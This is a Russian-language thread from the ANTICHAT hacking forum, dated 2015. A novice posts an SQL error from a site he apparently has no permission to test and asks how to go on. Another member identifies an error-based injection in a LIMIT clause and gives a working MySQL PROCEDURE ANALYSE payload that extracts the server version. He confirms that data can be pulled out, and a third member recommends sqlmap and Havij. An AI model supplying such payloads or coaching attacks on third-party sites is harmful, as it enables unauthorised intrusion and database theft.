ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
07.02.2015, 02:42
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
Помогите. Нашел уязвимость, прочитал статтю и захотел проверить сайт. Подставил в параметр \ и мне выдало такое:
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-35 , 35' at line 16 at /home/www/htdocs/modules/Festival/index.php line 93
Array
(
Код:
=> 1064
[message] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-35 , 35' at line 16
[query] =>
SELECT SQL_CALC_FOUND_ROWS
s.sid,
scontent.title as stitle,
scontent.hometext,
s.acomm,
s.comments,
s.counter,
s.time,
e.title,
e.shortdescript
FROM adv_stories s
LEFT JOIN adv_stories_content scontent ON (s.sid = scontent.sid)
LEFT JOIN adv_events e ON (s.eid=e.eid)
WHERE s.eid = '593'
ORDER BY s.time DESC, s.sid DESC
LIMIT -35 , 35
[context] => /home/www/htdocs/modules/Festival/index.php line 93
[time] => 07.02.2015 02:37:02
)
конечно обрадовался. Но, что дальше делать незнаю. Подскажите
|
|
|
07.02.2015, 02:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
стоит начать с изучения статей и синтаксиса mysql. это error-based, инъекция в limit. нужно использовать вектор procedure analyse().
Код:
PROCEDURE ANALYSE (0,(SELECT 3 ORDER BY (SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))))--+
тема с вопросами: /thread46016.html |
|
|
|
07.02.2015, 03:03
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
а можно ссылки на статьи и книжки, пожалуйста.
Сдесь можно вытащить с базы что то толковое, или нет?
|
|
|
|
07.02.2015, 03:07
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
вытащить можно. все находится в том же разделе, что вы и создали тему. ответы на все вопросы: /thread104591.html. стоит ознакомится, прежде чем задавать вопросы.
|
|
|
|
07.02.2015, 03:51
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
понял, спасибо
|
|
|
|
07.02.2015, 05:44
|
|
Постоянный
Регистрация: 27.08.2011
Сообщений: 640
Провел на форуме:
213865
Репутация:
72
|
|
Сообщение от teh
понял, спасибо
Поковыряй софтом, понятней будет
Sqlmap.org (включай логирование, будет видно какими запросами крутиться скуля)
Havij - ну это школософт)
А если хочешь все прочуить, протрогат - руками)
Даже поэффективней и побыстрей будет чем софтами, если конечно рука набита.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
